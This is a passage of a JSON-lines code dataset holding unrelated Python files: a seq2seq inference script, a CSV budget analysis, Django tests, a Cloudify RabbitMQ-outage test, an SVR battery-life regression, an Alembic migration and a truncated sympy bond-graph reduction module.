INPUT_TEXT_MAX_WORDS) for input_text in input_texts]\n timer = gezi.Timer()\n texts_list, scores_list = predictor.inference(['beam_text', 'beam_text_score'], \n feed_dict= {\n 'seq2seq/model_init_1/input_text:0': word_ids_list\n })\n\n for texts, scores in zip(texts_list, scores_list):\n for text, score in zip(texts, scores):\n print(text, text2ids.ids2text(text), score, math.log(score))\n\n print('beam_search using time(ms):', timer.elapsed_ms())\n\ndef main(_):\n text2ids.init()\n predictor = melt.Predictor(FLAGS.model_dir, debug=FLAGS.debug)\n \n #predict(predictor, \"任达华传授刘德华女儿经 赞停工陪太太(图)\")\n #predict(predictor, \"王凯整容了吗_王凯整容前后对比照片\")\n #predict(predictor, \"大小通吃汉白玉霸王貔貅摆件 正品开光镇宅招财\")\n #predict(predictor, \"学生迟到遭老师打 扇耳光揪头发把头往墙撞致3人住院\")\n #predict(predictor, \"宝宝太胖怎么办呢\")\n #predict(predictor, \"包邮买二送一性感女内裤低腰诱惑透视蕾丝露臀大蝴蝶三角内裤女夏-淘宝网\")\n #predict(predictor, \"蛋龟缸,目前4虎纹1剃刀\")\n #predict(predictor, \"大棚辣椒果实变小怎么办,大棚辣椒果实变小防治措施\")\n #predict(predictor, \"宝宝太胖怎么办呢\")\n predict(predictor, \"大棚辣椒果实变小怎么���,大棚辣椒果实变小防治措施\")\n\n predicts(predictor, [\n \"包邮买二送一性感女内裤低腰诱惑透视蕾丝露臀大蝴蝶三角内裤女夏-淘宝网\",\n \"大棚辣椒果实变小怎么办,大棚辣椒果实变小防治措施\",\n ])\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"deepiu/textsum/inference/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"572083718","text":"# importing the file via csv and os\nimport csv\nimport os\ncsvpath = os.path.join('..', 'Resources', 'budget_data.csv') \n\nwith open(csvpath, \"r\") as f:\n reader = csv.reader(f,delimiter = \",\")\n next(reader) # skip the first row\n data = list(reader) # make a list of lists\n row_count = len(data) # count the length of the list of lists\nprint(\"there are\", row_count, \"rows of data, excluding the header\")\n\n# quick test\n# print((data[0][0])) #gives Jan-2010; first list's first item\n# print((data[0][1])) #gives 867884; first list's second item\n\ntotal = 0 # first define total as 0\nfor i in range(0, row_count):\n total = total + int(data[i][1]) #sum through the \"i\"th list's item[1], which is the Profit/Losses values\n\n# calculate the change from month to month\nchange = []\nchange.append(None)\nfor i in range(0, (row_count-1)):\n change.append(int(data[i+1][1]) - int(data[i][1])) # take the value from i+1 month and subtract from i month's profit/losses\n\n# Quick check print(change)\n\n# \"\"\"Yield successive n-sized chunks from l.\"\"\"\n# How many elements each list should have \ndef divide_chunks(l, n): # set up a function that takes requires the l and n parameters\n # looping till length l \n for i in range(0, len(l), n): # for in in range from 0 to length of the \"l\"ist, \n yield l[i: i + n] # from the l list, slice from i to (i+n); not including (i+n)\n\nn = 1 #each list will have 1 elements; this is so we can combine this list with the other one later\nchange_list = list(divide_chunks(change, n)) \n\n# quick check\n# print(change_list)\n\n# take the change_list and flatten it so we can zip it with the original columns of data later\nflat_change_list = []\nfor sublist in change_list:\n for item in sublist:\n flat_change_list.append(item)\n# quick check print(flat_change_list)\n\n# append the flat_change_list to the existing data; essentially adding in the \"third column\", u.e., third item to each list/row\nfor x, y in zip(data, flat_change_list): \n x.append(y)\n\n# quick check\n# print(data)\n# print(data[0])\n# print(len(data)) \n# print(total) #38382578\n# print((data[0][2]))\n\n# calculate the total change by summing up all the month-to-month changes\ntotal_change = 0\nj=0\nfor j in range(1, row_count): #start with 1 instead of 0 because the first change is based on Feb - Jan \n total_change = total_change + data[j][2]\n# quick check\n# print(total_change) # -196785\n\n# calculate the average of the month-to-month change\naverage = round((total_change / (len(data)-1)),2) #len(data)-1 because for Nth months there are Nth-1 changes between months\n# quick check \n# print(len(data)-1) #85\n# print(average) #-2315.12\n\n# determine where the maximum month-to-month change occurs\nmaximum = int(data[1][2])\nj=0\nfor j in range(1, row_count): # start with 1 because the first \"month-to-month\" change is based on Feb (change from Jan)\n if int(data[j][2]) > int(maximum): \n maximum = data[j][2] # the 2-th item in the list (i.e., 3rd) is the change value\n maxrow = j\n maxdate = data[j][0] # the 0-th item in the list (i.e., 1st) is the date when the greatest change occurs\n\n# quick check\n# print(maximum) # 1926159\n# print(maxrow) # 25\n# print(data[maxrow]) # ['Feb-2012', '1170593', 1926159]\n\n# determine when the minimum month-to-month change occurs, i.e., greatest decrease\nminimum = int(data[1][2])\nk=0\nfor k in range(1, row_count):\n if int(data[k][2]) < int(minimum):\n minimum = data[k][2]\n minrow = k\n mindate = data[k][0]\n\n# quickcheck\n# print(minimum) # -2196167\n# print(minrow) # 44\n# print(data[minrow]) # ['Sep-2013', '-1196225', -2196167]\n\n# print out the results in the console\nprint(f\"Financial Analyis \\n\\\n---------------------- \\n\\\nTotal Months: {row_count} \\n\\\nTotal: ${total} \\n\\\nAverage change: ${average} \\n\\\nGreatest Increase in Profits: {maxdate} (${maximum}) \\n\\\nGreatest Decrease in Profits: {mindate} (${minimum})\")\n\n# print the results out as a csv file\n# the csvwriter.writerow lines are used to format the .csv file, each \"row\"/list has 4 items.\noutput_path = os.path.join(\"..\", \"Results\", \"PyBank_results.csv\")\n# Open the file using \"write\" mode. Specify the variable to hold the contents\nwith open(output_path, 'w', newline='') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',') # Initialize csv.writer\n csvwriter.writerow(['Financial Report', 'Date', 'Unit', 'Value']) # Write the first row (column headers)\n #csvwriter.writerow(['----------------------', '', '', ''])\n csvwriter.writerow(['Total Months', '', '$', row_count])\n csvwriter.writerow(['Total', '', '$', total])\n csvwriter.writerow(['Greatest Increase in Profits', maxdate, '$', maximum])\n csvwriter.writerow(['Greatest Decrease in Profits', mindate, '$', minimum])\nquit()\n","sub_path":"PyBank/Code/main_fullnote.py","file_name":"main_fullnote.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"404607049","text":"from django.test import TestCase\nfrom .views import *\nfrom .models import Message\nfrom django.contrib.auth.models import User\n\n\nclass MessengerTests(TestCase):\n def test_inbox_template(self):\n response = self.client.get('/messenger/inbox/')\n self.assertTemplateUsed(response, 'messenger/inbox.html')\n \n def test_sent_template(self):\n response = self.client.get('/messenger/sent/')\n self.assertTemplateUsed(response, 'messenger/sent.html')\n \n def test_message_does_not_exist(self):\n response = self.client.get('/messenger/message/1')\n self.assertEqual(response.status_code, 404)\n \n def test_view_message_that_exists(self):\n sender = User(username=\"sender\")\n sender.save()\n \n \n \n \n recipient = User(username=\"receiver\")\n recipient.save()\n \n message = Message(\n subject = \"Test Subject\",\n body = \"Test Body\",\n sender = sender,\n recipient = recipient)\n message.save()\n \n response = self.client.get('/messenger/message/1')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, \"messenger/message.html\")\n \n \n def test_post_message(self):\n sender = User.objects.create_user('sender', 'sender@example.com', 'sender')\n recipient = User.objects.create_user('recipient', 'recipient@example.com', 'recipient')\n self.client.login(username=\"sender\", password=\"sender\")\n \n message = {\n \"subject\": \"Test Subject\",\n \"body\": \"Test Body\",\n \"recipient\": recipient.id\n }\n\n response = self.client.post('/messenger/message/compose/', message)\n self.assertEqual(response.status_code, 302) \n \n ","sub_path":"messenger/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"497899665","text":"import sys\n\n# Name;Address;City\nhotel = sys.argv[1] + '\\n'\n\n# Path hotels/hotel_\nfilename = sys.argv[2]\n\noutput = open(filename, 'w')\noutput.write(hotel)\n\nfor i in range(100, 105):\n s = '2-bedroom;' + str(i) + ';20000\\n'\n output.write(s)\n\nfor i in range(200,205):\n s = '3-bedroom;' + str(i) + ';30000\\n'\n output.write(s)\n\nfor i in range(400,400):\n s = 'Suite;' + str(i) + ';50000\\n'\n output.write(s)\n","sub_path":"vinnsla/data/gen_hotels.py","file_name":"gen_hotels.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"165448265","text":"from cloudify_rest_client.exceptions import CloudifyClientError\nfrom cosmo_tester.framework.fixtures import ( # noqa\n image_based_manager_without_plugins,\n)\n\nmanager = image_based_manager_without_plugins\n\n\ndef test_tenant_creation_no_rabbitmq(manager):\n with manager.ssh() as fabric:\n fabric.sudo('systemctl stop cloudify-rabbitmq')\n\n try:\n manager.client.tenants.create('badtenant')\n assert False, (\n 'Tenant creation should have raised an exception'\n )\n except CloudifyClientError:\n pass\n\n with manager.ssh() as fabric:\n fabric.sudo('systemctl start cloudify-rabbitmq')\n\n # The tenant cannot have been properly created while rabbit was down, so\n # the tenant should not exist\n tenants = manager.client.tenants.list()\n tenant_names = [tenant['name'] for tenant in tenants.items]\n\n assert tenant_names == ['default_tenant']\n","sub_path":"cosmo_tester/test_suites/image_based_tests/tenant_creation_rabbitmq_down.py","file_name":"tenant_creation_rabbitmq_down.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"54934195","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom sklearn.svm import SVR\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_score\nimport pandas as pd\nimport seaborn as sns\nimport pickle\n\ndef main():\n # N_cycles = np.array([20,30,40,50,60,70,80,90,100])\n N_cycles = np.array([ 40])\n\n \n min_rmse = np.zeros(N_cycles.shape)\n min_mpe = np.zeros(N_cycles.shape)\n training_mpe = np.zeros(N_cycles.shape)\n min_percent_error = np.zeros(N_cycles.shape)\n# use_log_cycle_life = False \n use_log_features = True\n use_all_features = False\n which_features = [2,3,4,21,22,24,25,39,40,48,49,63,65]#list(map(int, np.linspace(2,12,11) ))\n \n best_C = np.zeros(N_cycles.shape)\n best_eps = np.zeros(N_cycles.shape) \n trained_models = []\n \n for i in np.arange(len(N_cycles)):\n print('Starting N_cycles = ' + str(int(N_cycles[i])))\n \n if use_log_features:\n file_name = \"training/Cycles_2TO\" + str(int(N_cycles[i])) + \"_log.csv\"\n else:\n file_name = \"training/Cycles_2TO\" + str(int(N_cycles[i])) + \".csv\"\n\n features, cycle_lives, feature_names = load_dataset(file_name, False, use_all_features, which_features)\n \n # make some arrays that depend on number of features\n if i == 0:\n norm_coeffs = np.zeros([features.shape[1],len(N_cycles)])\n\n# from sklearn import svm\n# X = [[0, 0], [2, 2]]\n# y = [0.5, 2.5] \n# clf = svm.SVR()\n# clf.fit(X, y) \n# clf.predict([[1, 1]])\n# \n\n# C = np.array([1000]) #np.linspace(1,1000,50)\n# C = np.linspace(1,100000,50)\n C = np.logspace(0,6,8)\n eps = np.logspace(-2.5,-0.5,6)\n\n rmse = np.zeros([len(C),len(eps)]) \n train_rmse = np.zeros([len(C),len(eps)])\n mpe = np.zeros([len(C),len(eps)]) \n\n\n \n for j in np.arange(len(C)):\n for k in np.arange(len(eps)):\n # SVR\n # my_SVR = sk.svm.SVR(kernel='rbf', degree=3, gamma='auto_deprecated', coef0=0.0, tol=0.001, C=1.0, epsilon=0.1, shrinking=True, cache_size=200, verbose=False, max_iter=1000)\n my_SVR = SVR(kernel='rbf',C=C[j], epsilon=eps[k])\n print('C = ' + str(C[j]))\n print('eps = ' + str(eps[k]))\n \n# if use_log_cycle_life:\n# my_SVR.fit(features,np.log10(cycle_lives))\n# predicted_cycle_lives = 10**my_SVR.predict(features)\n# residuals = predicted_cycle_lives - cycle_lives\n# train_rmse[j,k] = np.sqrt(((residuals) ** 2).mean())\n## R_squared = my_SVR.score(features,np.log10(cycle_lives))\n# mse = cross_val_score(my_SVR, features, np.log10(cycle_lives), cv=5, scoring='mean_squared_error')\n# rmse[j,k] = np.sqrt(np.mean(mse))\n# next_mpe = cross_val_score(my_SVR, features, np.log10(cycle_lives), cv=5, scoring=mean_percent_error)\n# mpe[j,k] = np.mean(next_mpe)\n# else:\n my_SVR.fit(features,cycle_lives)\n predicted_cycle_lives = my_SVR.predict(features)\n residuals = predicted_cycle_lives - cycle_lives\n train_rmse[j,k] = np.sqrt(((residuals) ** 2).mean())\n# R_squared = my_SVR.score(features,cycle_lives)\n mse = -cross_val_score(my_SVR, features, cycle_lives, cv=5, scoring='neg_mean_squared_error')\n rmse[j,k] = np.sqrt(abs(np.mean(mse)))\n next_mpe = cross_val_score(my_SVR, features, np.log10(cycle_lives), cv=5, scoring=mean_percent_error)\n mpe[j,k] = np.mean(next_mpe)\n \n plt.plot(cycle_lives,predicted_cycle_lives,'o')\n plt.plot([0,2400],[0,2400],'r-')\n plt.ylabel('Predicted cycle lives')\n plt.xlabel('Actual cycle lives')\n #plt.axis('equal')\n plt.axis([0, 1400, 0, 1400])\n plt.show()\n \n \n print('Training error:')\n print(train_rmse[j,k])\n \n print('RMSE with cross validation:')\n print(rmse[j,k])\n\n print('MPE with cross validation:')\n print(mpe[j,k])\n \n \n # print('N iterations to convergence: ' + str(int(enet.n_iter_)))\n# print('R_square = ' + str(R_squared))\n print('Finished N_cycles = ' + str(int(N_cycles[i])))\n print('=======================================')\n\n \n print('Min RMSE with cross validation:')\n print(np.min(rmse)) \n \n print('Min MPE with cross validation:')\n print(np.min(mpe)) \n \n min_rmse[i] = np.min(rmse)\n min_mpe[i] = np.min(mpe)\n# best_index = np.where(mpe==np.min(mpe))\n# best_C[i] = C[best_index[0]]\n# best_eps[i] = eps[best_index[1]]\n index_best = np.argmin(rmse)\n best_C_index = index_best // eps.shape[0]\n print('Best C index ' + str(int(best_C_index)))\n best_C[i] = C[best_C_index]\n \n best_eps_index = np.mod(index_best, eps.shape[0])\n print('Best eps index ' + str(int(best_eps_index)))\n best_eps[i] = eps[best_eps_index]\n\n print('Best eps:')\n print(best_eps[i])\n print('Best C:')\n print(best_C[i])\n \n print('Training MSE:')\n ax = sns.heatmap(train_rmse)\n plt.show()\n print('Cross-validation MSE:')\n ax = sns.heatmap(rmse)\n plt.show()\n print('Cross-validation MPE:')\n ax = sns.heatmap(mpe)\n plt.show()\n \n # Train new model using best hyperparameters:\n best_SVR = SVR(kernel='rbf',C=best_C[i], epsilon=best_eps[i])\n best_SVR.fit(features,cycle_lives)\n trained_models.append(best_SVR)\n \n predicted_cycle_lives = best_SVR.predict(features)\n residuals = predicted_cycle_lives - cycle_lives\n training_mpe[i] = (np.abs(residuals)/cycle_lives).mean()*100\n \n plt.plot(cycle_lives,predicted_cycle_lives,'o')\n plt.plot([0,2400],[0,2400],'r-')\n plt.ylabel('Predicted cycle lives')\n plt.xlabel('Actual cycle lives')\n #plt.axis('equal')\n plt.axis([0, 1400, 0, 1400])\n plt.show()\n \n # make nice plots\n plt.plot(N_cycles, min_rmse, '-o')\n plt.ylabel('RMSE error')\n plt.xlabel('N cycles')\n plt.show()\n \n plt.plot(N_cycles, min_mpe, '-o')\n plt.ylabel('MPE error')\n plt.xlabel('N cycles')\n plt.show()\n\n# plt.subplot(2, 1, 1)\n# plt.plot(N_cycles, optimal_l1_ratio, '-o')\n# plt.ylabel('Optimal L1 ratio')\n# plt.xlabel('N cycles')\n# \n# plt.subplot(2, 1, 2)\n# plt.plot(N_cycles, optimal_alpha, '-o')\n# plt.ylabel('Optimal alpha')\n# plt.xlabel('N cycles')\n# plt.show()\n \n # export coeff matrix to csv\n# df = pd.DataFrame(norm_coeffs, columns=N_cycles, index=feature_names)\n# df.to_csv(\"norm_coeffs.csv\")\n \n \n pickle.dump(trained_models, open('SVR_trained_models.pkl', 'wb'))\n pickle.dump(min_mpe, open('SVR_crossvalid_percenterror.pkl', 'wb')) \n pickle.dump(training_mpe, open('SVR_training_percenterror.pkl', 'wb')) \n\n \n\n \n \ndef load_dataset(csv_path, add_intercept=True, use_all_features=True, which_features=[2]):\n \"\"\"Load dataset from a CSV file.\n\n Args:\n csv_path: Path to CSV file containing dataset.\n add_intercept: Add an intercept entry to x-values.\n\n Returns:\n xs: Numpy array of x-values (features).\n ys: Numpy array of y-values (labels).\n headers: list of headers\n \"\"\"\n\n # def add_intercept_fn(x):\n # global add_intercept\n # return add_intercept(x)\n\n # # Validate label_col argument\n # allowed_label_cols = ('y', 't')\n # if label_col not in allowed_label_cols:\n # raise ValueError('Invalid label_col: {} (expected {})'\n # .format(label_col, allowed_label_cols))\n\n # Load headers\n with open(csv_path, 'r') as csv_fh:\n headers = csv_fh.readline().strip().split(',')\n\n # Load features and labels\n # x_cols = [i for i in range(len(headers)) if headers[i] == 'cycle_lives']\n # l_cols = [i for i in range(len(headers)) if headers[i] == label_col]\n if use_all_features:\n features = np.loadtxt(csv_path, delimiter=',', skiprows=1, usecols=range(2, len(headers)))\n else:\n features = np.loadtxt(csv_path, delimiter=',', skiprows=1, usecols=which_features)\n cycle_lives = np.loadtxt(csv_path, delimiter=',', skiprows=1, usecols=[1])\n feature_names = headers[2:len(headers)]\n\n m = features.shape[0]\n # print(m)\n # print(features.shape)\n # print( np.ones([m, 1]))\n if add_intercept:\n features = np.concatenate((np.ones([m, 1]), features),axis=1)\n feature_names = ['intercept'] + feature_names\n\n return features, cycle_lives, feature_names\n\n\ndef mean_percent_error(model, X, y):\n predicted_y = model.predict(X)\n residuals = predicted_y - y\n return (np.abs(residuals)/y).mean()*100\n\n \n\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"old/very_old/SVR_peter.py","file_name":"SVR_peter.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"444055251","text":"\"\"\"Add channel.template column\n\nRevision ID: 172a7254c12b\nRevises: 052c03de63d0\nCreate Date: 2020-05-09 12:36:25.400317\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '172a7254c12b'\ndown_revision = '052c03de63d0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.add_column(\n 'channels',\n sa.Column('template', sa.Text(), server_default='', nullable=False),\n )\n\n\ndef downgrade():\n op.drop_column('channels', 'template')\n","sub_path":"migrations/versions/2020-05-09_12:36_add_channel_template_column.py","file_name":"2020-05-09_12:36_add_channel_template_column.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"90870822","text":"import json\nwith open('Parcels_2016_Data_Full.geojson', 'w') as geojson_file:\n data = json.load(geojson_file)\n # data is now a dict,\n # you can do whatever you want with it\n \n\n\n\"\"\" import pandas as pd \nimport numpy as np \n\nfields = ['OBJECTID','PTYPE','U_NUM_PARK','GIS_ID','FULL_ADDRESS','SHAPESTArea','SHAPESTLength']\ndf = pd.read_csv('Parcels_2016_Data_Full.csv', delimiter=',', usecols=fields)\n\"\"\" \nfor prop in df.PTYPE:\n if prop>=0 and prop<200:\n df.drop([0, 1])\nfor parking in df.U_NUM_PARK: \"\"\"\n\nprint (df) \"\"\"\n","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"404491562","text":"\nimport logging\nimport sympy as sp\nimport numpy as np\nfrom .exceptions import SymbolicException\n\nlogger = logging.getLogger(__name__)\n\n\nclass NotInvertible(Exception):\n pass\n\n\ndef extract_coefficients(equation, local_map, global_coords):\n\n coeff_dict = {}\n nonlinear_terms = sp.S(0)\n subs = [(k, global_coords[v]) for k, v in local_map.items()]\n\n subs.sort(key=lambda x: str(x[1])[-1], reverse=True)\n logger.info(\"Extracting coefficients from %s\", repr(equation))\n logger.info(\"Using local-to-global substitutions %s\", repr(subs))\n\n terms = equation.expand().args\n if not terms:\n if equation in local_map:\n coeff_dict[local_map[equation]] = sp.S(1)\n else:\n nonlinear_terms = equation\n else:\n for term in terms:\n factors = list(flatten(term.as_coeff_mul()))\n logger.info(\"Factors: %s\", repr(factors))\n coeff = sp.S(1)\n base = []\n while factors:\n factor = factors.pop()\n if factor.is_number:\n coeff *= factor\n else:\n base.append(factor)\n logger.info(\"Base: %s\", repr(base))\n if len(base) == 1 and base[0] in local_map:\n coeff_dict[local_map[base[0]]] = coeff\n else:\n new_term = term\n new_term = new_term.subs(subs)\n nonlinear_terms = sp.Add(new_term, nonlinear_terms)\n\n logger.info(\"Linear terms: %s\", repr(coeff_dict))\n logger.info(\"Nonlinear terms: %s\", repr(nonlinear_terms))\n\n return coeff_dict, nonlinear_terms\n\n\ndef _generate_substitutions(linear_op, nonlinear_op, constraints, coords, size_tup):\n\n # Lx + F(x) = 0 => Ix = (I - L)x - F(x) = Rx - F(x)\n # Since L is in smith normal form (rref and square)\n # If (Rx)_{ii} = 0, and F(x)_i doesn't depend upon x_i\n # then we have x_i = (Rx)_i - F_i(x)\n c_atoms = set(coords)\n atoms = nonlinear_op.atoms() & c_atoms\n for constraint in constraints:\n atoms |= (constraint.atoms() & c_atoms)\n\n if not atoms:\n logger.info(\"No substitutions required\")\n return []\n\n Rx = (sp.eye(linear_op.rows) - linear_op)\n\n ss_size, js_size, cv_size, n = size_tup\n substitutions = []\n for i in reversed(range(2*(ss_size + js_size))):\n co = coords[i]\n if Rx[i,i] == 0 and co in atoms and not co in nonlinear_op[i].atoms():\n\n eqn = Rx[i,:].dot(coords) - nonlinear_op[i]\n pair = (coords[i], eqn)\n logger.info(\"Generating substition %s = %s\",\n repr(coords[i]), repr(eqn))\n substitutions = [\n (c, s.subs(*pair)) for c, s in substitutions\n ]\n substitutions.append(pair)\n\n return substitutions\n\n\ndef _process_constraints(linear_op,\n nonlinear_op,\n constraints,\n coordinates,\n size_tup):\n\n initial_constraints = []\n ss_size, js_size, cv_size, n = size_tup\n offset = 2 * js_size + ss_size\n\n coord_atoms = set(coordinates[0:offset+ss_size])\n cv_constraints = [\n linear_op[i,:].dot(coordinates) + nonlinear_op[i,0]\n for i in range(offset+ss_size, n)\n ]\n constraints += [cons for cons in cv_constraints if cons]\n linear_op = linear_op[:offset+ss_size, :]\n nonlinear_op = nonlinear_op[:offset+ss_size, :]\n\n while constraints:\n constraint, _ = sp.fraction(constraints.pop())\n logger.info(\"Processing constraint: %s\",repr(constraint))\n atoms = constraint.atoms() & set(coord_atoms)\n\n # todo: check to see if we can solve f(x) = u => g(u) = x\n if len(atoms) == 1:\n c = atoms.pop()\n logger.info(\"Attempting to find inverse\")\n solns = list(sp.solveset(constraint, c))\n if len(solns) == 1:\n idx = coordinates.index(c)\n sol = solns.pop()\n\n linear_op = linear_op.col_join(\n sp.SparseMatrix(1, linear_op.cols, {(0, idx): 1})\n )\n nonlinear_op = nonlinear_op.col_join(\n sp.SparseMatrix(1, 1, {(0,0): -sol})\n )\n constraint = c - sol\n else:\n logger.warning(\"..skipping %s\", repr(constraint))\n initial_constraints.append(constraint)\n try:\n partials = [constraint.diff(c) for c in coordinates]\n except Exception as ex:\n logger.exception(\"Could not differentiate %s with respect to %s\",\n repr(constraint),repr(coordinates)\n )\n raise ex\n\n if any(p != 0 for p in partials[0:offset]):\n logger.warning(\"Cannot yet reduce order of %s\", repr(constraint))\n initial_constraints.append(constraint)\n else:\n ss_derivs = partials[offset: offset + ss_size]\n cv_derivs = partials[offset + ss_size:]\n factor = 0\n lin_dict = {}\n nlin = 0\n for idx, coeff in enumerate(ss_derivs):\n if factor == 0 and coeff != 0:\n factor = 1 / coeff\n lin_dict.update({(0, idx): 1})\n elif factor != 0 and coeff != 0:\n new_coeff = sp.simplify(coeff / factor)\n if new_coeff.is_number:\n lin_dict.update({(0, idx): new_coeff})\n else:\n nlin += new_coeff * coordinates[idx]\n if factor == 0:\n raise SymbolicException(\"Invalid Constraint %s\",\n repr(constraint))\n for idx, coeff in enumerate(cv_derivs):\n if coeff != 0:\n cv = coordinates[offset+ss_size+idx]\n dvc = sp.Symbol(f\"d{str(cv)}\")\n try:\n dc_idx = coordinates.index(dvc)\n except ValueError:\n dc_idx = len(coordinates)\n coordinates.append(dvc)\n cv_size += 1\n n += 1\n linear_op = linear_op.row_join(\n sp.SparseMatrix(linear_op.rows, 1, {})\n )\n eqn = coeff/factor\n if eqn.is_number:\n lin_dict.update({(0, dc_idx): eqn})\n else:\n nlin += eqn*dvc\n linear_op = linear_op.col_join(\n sp.SparseMatrix(1,linear_op.cols, lin_dict)\n )\n nonlinear_op = nonlinear_op.col_join(\n sp.SparseMatrix(1,1,{(0,0):nlin})\n )\n\n linear_op, nonlinear_op, new_constraints = smith_normal_form(\n matrix=linear_op,\n augment=nonlinear_op)\n\n return linear_op, nonlinear_op, new_constraints + initial_constraints, \\\n coordinates, (ss_size, js_size, cv_size, n)\n\n\ndef create_ds(coords, mapping, linear, nonlinear, constraints):\n\n ss_size = len(mapping[0])\n js_size = len(mapping[1])\n\n ##\n # We'd hope that the Linear Operator is in block form\n #\n # L = [[A_1 B_1 C_1],\n # [0 B_2 C_2],\n #\n # X = [[dx, l, x]]\n #\n # So that L.dot(X) + F(X,t) = 0\n #\n\n A_1 = linear[0:ss_size, 0:ss_size]\n B_1 = linear[0:ss_size, ss_size: 2*js_size + ss_size]\n C_1 = linear[0:ss_size, 2*js_size + ss_size:2*(js_size + ss_size)]\n D_1 = linear[0:ss_size, 2*(js_size + ss_size):]\n F_1 = nonlinear[0:ss_size,:]\n\n B_2 = linear[ss_size: 2*js_size + ss_size, ss_size: 2*js_size + ss_size]\n C_2 = linear[ss_size: 2 * js_size + ss_size,\n 2 * js_size + ss_size:2 * (js_size + ss_size)]\n D_2 = linear[ss_size: 2 * js_size + ss_size, 2 * (js_size + ss_size):]\n F_2 = nonlinear[ss_size: 2 * js_size + ss_size, :]\n\n assert (B_2 - sp.eye(B_2.rows)).is_zero\n assert (A_1 - sp.eye(A_1.rows)).is_zero\n\n ds = (\n np.array(A_1).astype(np.float64),\n np.array(C_1).astype(np.float64),\n np.array(D_1).astype(np.float64)\n )\n\n def port_func(x,t):\n\n pass\n\n\n # dX = -C_1*X + -D_1*U - F_1(X)\n # J = -C_2*X - -D_2*U - F_2(X)\n #\n # x=(y,z) s.t. [dy,dz] = [0, f(y,z,u)]\n # set x = [[ M_1^T ] (y\n # [ M_2^T ]] z)\n #\n\n\ndef _generate_cv_substitutions(subs_pairs, mappins, coords):\n state_map, port_map, control_map = mappins\n ss_size = len(state_map)\n\n cv_offset = 2*(ss_size + len(port_map))\n\n control_vars = {str(c) for c in coords[cv_offset:]}\n print(control_vars)\n subs = []\n for var, fx_str in subs_pairs.items():\n\n if var in control_vars:\n u = sp.S(var)\n elif var in control_map:\n u = sp.S(f\"u_{control_map[var]}\")\n else:\n raise SymbolicException(\"Could not substitute control variable %s\",\n str(var))\n fx = sp.sympify(fx_str)\n\n subs.append((u, fx))\n\n return subs\n\n\ndef reduce_model(linear_op, nonlinear_op, coordinates, size_tuple,\n control_vars=None):\n \"\"\"\n Args:\n linear_op: Linear part of the constitutive relations.\n nonlinear_op: The corresponding nonlinear part; a symbolic vector with\n the same number of rows.\n coordinates: a list of all the relevant co-ordinates\n size_tuple:\n\n Returns:\n\n\n Todo:\n refactor so as to remove size_tuple;\n the co-ordinates should arrive partitioned!\n \"\"\"\n #\n linear_op, nonlinear_op, constraints = smith_normal_form(\n matrix=linear_op,\n augment=nonlinear_op)\n\n rows_added = 0\n added_cvs = []\n cv_diff_dict = {}\n lin_dict = {}\n nlin_dict = {}\n\n logger.info(\"Handling algebraic constraints\")\n\n ###\n # First; take care of control variables\n #\n\n #\n # Then substitute as much of the junction space as possible.\n #\n\n subs_list = _generate_substitutions(\n linear_op, nonlinear_op, constraints, coordinates, size_tuple\n )\n logger.info(\"Applying substitutions\")\n\n nonlinear_op = nonlinear_op.subs(subs_list)\n constraints = [c.subs(subs_list) for c in constraints]\n\n logger.info(\"Reducing purely algebraic constraints\")\n # second, reduce the order of all nonlinear constraints\n linear_op, nonlinear_op, constraints, coordinates, size_tuple =\\\n _process_constraints(linear_op, nonlinear_op,\n constraints, coordinates, size_tuple)\n logger.info(\"Applying substitutions, round 2\")\n subs_list = _generate_substitutions(\n linear_op, nonlinear_op, constraints, coordinates, size_tuple\n )\n nonlinear_op = nonlinear_op.subs(subs_list)\n constraints = [c.subs(subs_list) for c in constraints]\n ##\n # Split the constraints into:\n # - Linear constraints; ie Lx = 0\n # - Nonlinear Constraints Lx + F(x) = 0\n #\n # Linear constraints are rows with more than 1 non-zero\n # that are not in the derivative subspace, and have a zero nonlinear part\n #\n # ## New Code\n ss_size, js_size, cv_size, n = size_tuple\n offset = 2 * js_size + ss_size\n for row in reversed(range(linear_op.rows, offset)):\n atoms = nonlinear_op[row].atoms()\n if not atoms & set(coordinates) and linear_op[row].nnz() > 1:\n logger.info(\"Linear constraint in row %s\", repr(row))\n for idx in range(ss_size):\n v = linear_op[row, idx + offset]\n if v:\n lin_dict.update({(rows_added,idx): v})\n for idx in range(cv_size):\n v = linear_op[row, idx + offset+ss_size]\n if v:\n cv_diff_dict.update({(rows_added, idx): v})\n\n for row in range(offset, linear_op.rows):\n logger.info(\"Testing row %s: %s + %s\", repr(row),\n repr(linear_op[row, :].dot(coordinates)),\n repr(nonlinear_op[row]) if nonlinear_op else '')\n\n nonlinear_constraint = nonlinear_op[row]\n F_args = set(coordinates[0:offset + ss_size]) & \\\n nonlinear_constraint.atoms()\n if linear_op[row, offset:-1].is_zero and not nonlinear_constraint:\n continue\n\n state_constraint = linear_op[row, offset: offset + ss_size]\n control_constraint = linear_op[row, offset + 